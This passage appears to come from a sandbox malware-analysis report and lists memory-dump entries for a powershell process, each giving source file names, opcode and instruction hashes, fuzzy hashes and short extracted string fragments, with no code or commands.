                                                  • API String ID: 0-3516880073
                                                  • Opcode ID: 79fe8bff7ecdae065038f63f791d031356890c05a9c4e25258f167fbabb2f83e
                                                  • Instruction ID: 29df9d1ab9654c0434a8074321082ddcbe7ab9557dd09087148843775baf2854
                                                  • Opcode Fuzzy Hash: 79fe8bff7ecdae065038f63f791d031356890c05a9c4e25258f167fbabb2f83e
                                                  • Instruction Fuzzy Hash: 4B1228B4A00245EFD714CF98C951EA9FBB2EF85314F25C069E9099B765CB32EC42CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fGl$h2:k
                                                  • API String ID: 0-634067072
                                                  • Opcode ID: 7c00c8560e4175e6440980a40d1090438e3acada8626ab7e9aca2e0c6f3dbc5d
                                                  • Instruction ID: 3015a75a96155ed11bc1a8f3960aa60a3b853821a9aacf7a66ee70e096187acf
                                                  • Opcode Fuzzy Hash: 7c00c8560e4175e6440980a40d1090438e3acada8626ab7e9aca2e0c6f3dbc5d
                                                  • Instruction Fuzzy Hash: B9021BB4B00209DFDB14CB98C951EA9FBB2EF89314F26C069E9059B755C772EC42CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2235846358.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4f20000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TAp$TAp
                                                  • API String ID: 0-421376115
                                                  • Opcode ID: 5f90ca3428ad1c49097cebd471df782185d6c8dec2ef4b833db13fd8a38905f6
                                                  • Instruction ID: 5254cde979dd5c3dc9f7de8049806984b5ba5e93f406ac543d3afb36b0950af1
                                                  • Opcode Fuzzy Hash: 5f90ca3428ad1c49097cebd471df782185d6c8dec2ef4b833db13fd8a38905f6
                                                  • Instruction Fuzzy Hash: 50B16C71E10229CFDB10CFA8DA957DEBBF1AF48314F148129D815E7294EB34A846DBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2235846358.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4f20000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TAp$TAp
                                                  • API String ID: 0-421376115
                                                  • Opcode ID: 14fc00ea835f5febfb5fd7261bfa77a8b388a5518acd2c9f098156f0fc1d2bcb
                                                  • Instruction ID: f0f6ee35b749a11183fde3b9233b5b188db33f466f3df3f2b54bc0453435c8f2
                                                  • Opcode Fuzzy Hash: 14fc00ea835f5febfb5fd7261bfa77a8b388a5518acd2c9f098156f0fc1d2bcb
                                                  • Instruction Fuzzy Hash: A6B19F70E1022ADFDB10CFA8DA9179DBBF1BF48318F148129D815E7254EB74A886DF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fGl
                                                  • API String ID: 0-4087618542
                                                  • Opcode ID: c52f3b01bb6670c7b03ee9f6621ef899d92ca7b1983eb8302d077d39fd7825ae
                                                  • Instruction ID: d7f3a62a10b656768bfa02eb522d2a6af93b2d734d3b9ab59d41f58554bacceb
                                                  • Opcode Fuzzy Hash: c52f3b01bb6670c7b03ee9f6621ef899d92ca7b1983eb8302d077d39fd7825ae
                                                  • Instruction Fuzzy Hash: 64F13BB4A00209DFDB14CB98C951EA9FBB2FF89314F26C169E9159B355C732EC42CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: x.8k
                                                  • API String ID: 0-1893939374
                                                  • Opcode ID: 27feacb70c550fe6210782bf10165b4ef4e750ef1a1b225a9b9f79aac9f5c820
                                                  • Instruction ID: f47a48693e34205f88a8a5932fc55c9584ecd268ae63157a2b1dd9f3f2fec3b4
                                                  • Opcode Fuzzy Hash: 27feacb70c550fe6210782bf10165b4ef4e750ef1a1b225a9b9f79aac9f5c820
                                                  • Instruction Fuzzy Hash: 0A3180B4740204ABD314E768C965FAEBBB3ABD5354F108428E9016F3A1CF76DC458BE5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2235846358.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4f20000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 63af68a1cd7ce5e619aeff25ae195e894ec5bfaef410930c2a783b195e4dd19c
                                                  • Instruction ID: a64a6388906e3631e805dae50539e46209f58a9016fbfe37d136bba2b5bda2c0
                                                  • Opcode Fuzzy Hash: 63af68a1cd7ce5e619aeff25ae195e894ec5bfaef410930c2a783b195e4dd19c
                                                  • Instruction Fuzzy Hash: 31F11675E00219DFCB05CF98D584AAEBBB2FF88310F258559E815AB365C735ED82CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2235846358.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4f20000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f8923c326b49d809cac25a0c650baf4c2dda978c12a3f6896a0408a41ef37777
                                                  • Instruction ID: b51938a23875b90362c98f71b5398ab5af6d88800c08c17288d7ee40a01bd0f4
                                                  • Opcode Fuzzy Hash: f8923c326b49d809cac25a0c650baf4c2dda978c12a3f6896a0408a41ef37777
                                                  • Instruction Fuzzy Hash: 7AC19D35A002589FCB14EFA5CA44AADBBF2FF85310F154569E4069F264DB34ED4ACB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2235846358.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4f20000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: af8c62f9d865cc88565a6bedb2ea9c957da8c4f2af6b0b8f42e47e296bdb0d5c
                                                  • Instruction ID: da84236b7511a9ae49d2b56d67740e79777f33f5a6d9fe5125f90596d6508864
                                                  • Opcode Fuzzy Hash: af8c62f9d865cc88565a6bedb2ea9c957da8c4f2af6b0b8f42e47e296bdb0d5c
                                                  • Instruction Fuzzy Hash: 3B71B030A00219CFCB14EF68C994A9DFBF6FF89314F18886AD415DB265DB71AC46CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2235846358.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4f20000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4244a563f0d7412e1cbe10c6e875eddc4ceeeb6e8da56238e590f5d450efec81
                                                  • Instruction ID: 9f13ad711770ee12c67073b91c5a03c314695463b31443182e28cadf921c4ddb
                                                  • Opcode Fuzzy Hash: 4244a563f0d7412e1cbe10c6e875eddc4ceeeb6e8da56238e590f5d450efec81
                                                  • Instruction Fuzzy Hash: 85715B30E00219DFDB18EFB4D554AADBBF2BF88314F148429D412AB2A4DB75AD46CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 71dea4dfa3dd17dea910b36c122e203241376d7f5e833d38a3a043480417ce32
                                                  • Instruction ID: 5313a204083f3e16e1c796a52a33ad9bb5e6ea742432529d234298d345cb76ec
                                                  • Opcode Fuzzy Hash: 71dea4dfa3dd17dea910b36c122e203241376d7f5e833d38a3a043480417ce32
                                                  • Instruction Fuzzy Hash: 224187F17442618BCB31D2789811EEAFB929F86334B2044FAD9418F356DE329D01C7B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2235846358.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4f20000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a63469e10a2b6808da8fabacf01903a54b09c6d6294b8f253c47bd7518438d73
                                                  • Instruction ID: 6ab9fd1ebd6e86aaaf5c30814a4888070e50e3733cff2e94f633aed946bac158
                                                  • Opcode Fuzzy Hash: a63469e10a2b6808da8fabacf01903a54b09c6d6294b8f253c47bd7518438d73
                                                  • Instruction Fuzzy Hash: 3A41BF34B042159FDB15EF24CA54AAE7BF6EF88354F085469E406EB3A4CF35AD42CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2235846358.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4f20000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 88f8cac9c78e2b15a3818ec81b4f24eb13232418bc4839976cf67e4162be517e
                                                  • Instruction ID: f92df19d968c5d3146f9028db92dae09ea08c99e25000d59cef4b85356e8358d
                                                  • Opcode Fuzzy Hash: 88f8cac9c78e2b15a3818ec81b4f24eb13232418bc4839976cf67e4162be517e
                                                  • Instruction Fuzzy Hash: 6E51C834A00219EFDB05CF98D584A9DFBB2FF88314F288559E805AB365C775ED86CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2235846358.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4f20000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7b75cf12c22478a4ad8868ca894c5be7084d452cdec4d7c0fa32d7fd98c8d7f9
                                                  • Instruction ID: 6939b14a2252d3b909f6b3b682a1fe8b308936c6bed5a2860305351e96adb712
                                                  • Opcode Fuzzy Hash: 7b75cf12c22478a4ad8868ca894c5be7084d452cdec4d7c0fa32d7fd98c8d7f9
                                                  • Instruction Fuzzy Hash: B941AE30E00218CFDB18EFB9C954A9DBBF2BF89314F14842DD005AB3A8DB71A946CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2235846358.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4f20000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1b45f9fac727f01d9cbae23803d9342a7b6c81591c27feaef2aa1a667a33506b
                                                  • Instruction ID: 0776a39a3f10ac9d636403c6335c3687eab78044171663b74516819a122656e9
                                                  • Opcode Fuzzy Hash: 1b45f9fac727f01d9cbae23803d9342a7b6c81591c27feaef2aa1a667a33506b
                                                  • Instruction Fuzzy Hash: 75416CB4A002158FCB09CF58C294AAEFBB1FF48310B168599D801AB364C736FD51CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5cd1ef90b1dd8019ca049ab5fb8e34f6f1f392a0024e1b7458dd8f3ab50ce8a5
                                                  • Instruction ID: c081fd2aa03b7a593a4634a28f7c6245356b9a5d0d8206d65c1b689b2d0383fa
                                                  • Opcode Fuzzy Hash: 5cd1ef90b1dd8019ca049ab5fb8e34f6f1f392a0024e1b7458dd8f3ab50ce8a5
                                                  • Instruction Fuzzy Hash: 8A21ABF170438A2BDB2405B68804B72BB92DF82211F1A847BD544CF2C6E82B8D49C371
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7a375da106b3bbb76981693f4ed70d05a8ab754d1e0555ebebf0d7a36de09100
                                                  • Instruction ID: c343f5c738b7d5b6db5061ebbbb1590f22b98269f3a18810f015f7d45b39d017
                                                  • Opcode Fuzzy Hash: 7a375da106b3bbb76981693f4ed70d05a8ab754d1e0555ebebf0d7a36de09100
                                                  • Instruction Fuzzy Hash: 9E2126B170021A6BDB2499AA8809B37E6C6DBC5714F25843AA549CB385ED37DD45C360
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2235846358.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4f20000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0586c5bc5d035214dc863cb360748b7d20708eb0575cd06e7c3d5f82b8eb521a
                                                  • Instruction ID: 1ea3c818372f8ba05e1a422ebaa69cc75f82db1335adb9a908171333af6a2f74
                                                  • Opcode Fuzzy Hash: 0586c5bc5d035214dc863cb360748b7d20708eb0575cd06e7c3d5f82b8eb521a
                                                  • Instruction Fuzzy Hash: E3313730A011288FCB25DB64C9556EEB7B2BF89304F1144E9D509AB261DF35EE82CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2235846358.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4f20000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ac11366f2fe0d3bdb24b0b08f540d362a51da9712f37862390a6250af48c38d3
                                                  • Instruction ID: 57cbb43b7bbdd9274af2f3fbf98fe60892cacc869bfb2b4c0f8ccd0000e9773f
                                                  • Opcode Fuzzy Hash: ac11366f2fe0d3bdb24b0b08f540d362a51da9712f37862390a6250af48c38d3
                                                  • Instruction Fuzzy Hash: A4313670E006158FCB54CF99C5949AAFBB2FF48310B258699D458AB361C331FC42CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a8de6a6527e4f102c957ae65ae75bfc6d87a1feeb77b172b2d2f87de220b9f41
                                                  • Instruction ID: 498a9d9e3cb93d1c505516ff00ca1edfba2266d0beb34586749d52cb432be876
                                                  • Opcode Fuzzy Hash: a8de6a6527e4f102c957ae65ae75bfc6d87a1feeb77b172b2d2f87de220b9f41
                                                  • Instruction Fuzzy Hash: AF01F77630021ADBC72495AAE401A7BFB99DBD6222F15C43ED549CB250E633CC49C760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2235846358.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4f20000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba51a47d3b791efda35c35af79806c3fbe37fd0e33da28453336140533ab7b22
                                                  • Instruction ID: 95509e00a76d8313d4a143dd24b13db634b4501d5ccdcaa93800863ab01a8cfe
                                                  • Opcode Fuzzy Hash: ba51a47d3b791efda35c35af79806c3fbe37fd0e33da28453336140533ab7b22
                                                  • Instruction Fuzzy Hash: 1411E935A00219EFDB05CF98D984A9DFBB2FF48314F288558E805AB365C771E982CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 00b423113c4814286dab83bcc6704d0240b3ad6335bf14ed7a2871f21a731f61
                                                  • Instruction ID: 1861aea5c2237600b14148232df240c2ef6d264adbced98752aa54d1accbbe2f
                                                  • Opcode Fuzzy Hash: 00b423113c4814286dab83bcc6704d0240b3ad6335bf14ed7a2871f21a731f61
                                                  • Instruction Fuzzy Hash: E7F01CA864E3C16FC317536418219E66F729A83614B1640E7D181CF6E3D9288D49C377
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,SGl$,SGl$4'^q$4'^q$4'^q$4'^q$d57k$tP^q$tP^q$xSGl$$^q$$^q$$^q$$^q$=l$=l
                                                  • API String ID: 0-2732500583
                                                  • Opcode ID: bb2813ff726fc4a9bc4691828b8286852fb7a9d627a8801e45ff8e180381c3b0
                                                  • Instruction ID: 9f046db9c1439e7e8fd100d17740eb3f9e6ef86684dbea781e377668ba9af187
                                                  • Opcode Fuzzy Hash: bb2813ff726fc4a9bc4691828b8286852fb7a9d627a8801e45ff8e180381c3b0
                                                  • Instruction Fuzzy Hash: 1DF128B1B043569FCB259B689804B6AFFA6AF86330F1484EBD585CF251DB31CC45C7A2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'^q$4'^q$84El$84El$84El$84El$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
                                                  • API String ID: 0-3840869574
                                                  • Opcode ID: 582f7f6b95eb3606fc38c202989c73d17ee5b0fa3691681b88fa034637272d42
                                                  • Instruction ID: 993c2f68175d011157cb35084fba2aec88d5ae7ca0c6c2e5863d58eb59085149
                                                  • Opcode Fuzzy Hash: 582f7f6b95eb3606fc38c202989c73d17ee5b0fa3691681b88fa034637272d42
                                                  • Instruction Fuzzy Hash: 62A119B1B0011A9FDB28CF68C904B6AFBE2BF85310F158469E8419F395CB31DD85C7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$=l$=l
                                                  • API String ID: 0-2044691982
                                                  • Opcode ID: e2f3348b76c4187659deb2f11c952162cebb5c3690a67a994a25abecbe5d4815
                                                  • Instruction ID: 17803d053534124084bf63ca0966cd25ef030e407880dd13af6e27626b8f52a0
                                                  • Opcode Fuzzy Hash: e2f3348b76c4187659deb2f11c952162cebb5c3690a67a994a25abecbe5d4815
                                                  • Instruction Fuzzy Hash: A5B147B17043458FC7259A699810AB6FFE6AFC2330F1984EAE445CF392DA31DD45C7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fGl$(fGl$(fGl$(fGl$4'^q$4'^q$tL9k$x.8k$-8k
                                                  • API String ID: 0-1729310406
                                                  • Opcode ID: 3bd0b5ab5292f38f570d59c97919c48d22fd612378f29733baa79b3c572ed7ea
                                                  • Instruction ID: d87bbbbeea37f2e741a3663d75dfd4849145f8e04a9dffc456aefef76c7aba8e
                                                  • Opcode Fuzzy Hash: 3bd0b5ab5292f38f570d59c97919c48d22fd612378f29733baa79b3c572ed7ea
                                                  • Instruction Fuzzy Hash: C2025CB4A00218DFCB24DB28C951FDABBB2FF89704F1084A9D4096B795DB35AD85CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 84El$84El$XRcq$XRcq$XRcq$tP^q$tP^q$$^q
                                                  • API String ID: 0-773893571
                                                  • Opcode ID: 945e9d27cd0ce6503df47c46703ffedcb9e79c99ad5f44b85d9baed67ab2f009
                                                  • Instruction ID: 6a76f93afb8c5379ab21cf9cd1b37fbe5296ff634459e5adaaef0a22642a7169
                                                  • Opcode Fuzzy Hash: 945e9d27cd0ce6503df47c46703ffedcb9e79c99ad5f44b85d9baed67ab2f009
                                                  • Instruction Fuzzy Hash: C06104B1B002069FCB24DF69D404E6AFBE2AF89310F24C469E4669F395CB71DD45CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'^q$4'^q$84El$84El$tP^q$tP^q$$^q$$^q
                                                  • API String ID: 0-3333040588
                                                  • Opcode ID: 5cba53411ba4bca41ff5363c6c64eb7ca279cf27c71e7b2f4fa876b86e2be765
                                                  • Instruction ID: 18584b5cc826b4791b692205b335ddb02bc2f00e4ab0763449571c0ec6eb37d0
                                                  • Opcode Fuzzy Hash: 5cba53411ba4bca41ff5363c6c64eb7ca279cf27c71e7b2f4fa876b86e2be765
                                                  • Instruction Fuzzy Hash: EB61E5B5B4020ADFCB148F54D940BAEFBA2BB89310F24C455E962AF394CB31DD91C7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 84El$84El$tP^q$tP^q$$^q
                                                  • API String ID: 0-3963636007
                                                  • Opcode ID: 8b7117bf6ff5d57271fd36e8d1b14ae820e4f2272a2385dfb80f5ced443b1987
                                                  • Instruction ID: 04ca19e6b594d90393ea57e756315533f0573f2f5b8fe006c43a104bd77da553
                                                  • Opcode Fuzzy Hash: 8b7117bf6ff5d57271fd36e8d1b14ae820e4f2272a2385dfb80f5ced443b1987
                                                  • Instruction Fuzzy Hash: AE6107B1B002059FCB25DF68D454E6AFBE2AF8A710F28C469E4459F391CB32DD45CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                  • API String ID: 0-3272787073
                                                  • Opcode ID: 28646599652be3ef2dde2eba333c0530e358e57fd97eb4d89754a5f9552a9e45
                                                  • Instruction ID: 396155a783525875e1697e9bd1fa1e2147a87792c157b05818b2acd23ee0aa2b
                                                  • Opcode Fuzzy Hash: 28646599652be3ef2dde2eba333c0530e358e57fd97eb4d89754a5f9552a9e45
                                                  • Instruction Fuzzy Hash: AD4116B4B04306DFCB259B749810ABABFA1AFC2350F14846AD945CF295EB35CD45C7A2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                  • API String ID: 0-3272787073
                                                  • Opcode ID: b3a3420ee56f35cb66764f1a72c81277e414fba2ad86e165a596dccd2db0c44a
                                                  • Instruction ID: 9b56f50a90d71d13bbc04b1917e91b94def2e5e5d20b11249de13c02dd2eccfb
                                                  • Opcode Fuzzy Hash: b3a3420ee56f35cb66764f1a72c81277e414fba2ad86e165a596dccd2db0c44a
                                                  • Instruction Fuzzy Hash: BB3166B274431ACFCB394A7994086B6FBE5AF82612B2484BAC445CF245DF36CC85C761
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                  • API String ID: 0-3997570045
                                                  • Opcode ID: eb2f2f07472a526c84a4185fc6a0b67b6d8cd5e5485d93a6e5269b26070223e3
                                                  • Instruction ID: d81b19a2b2c9a3c7b9239885ebfebbdc230595a038f3f4a636fd286822f9e0e3
                                                  • Opcode Fuzzy Hash: eb2f2f07472a526c84a4185fc6a0b67b6d8cd5e5485d93a6e5269b26070223e3
                                                  • Instruction Fuzzy Hash: BF31DFB1A00209EFDB288F55C544BA5F7F2ABC5720F18C46AE8959F290CB31DD86CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
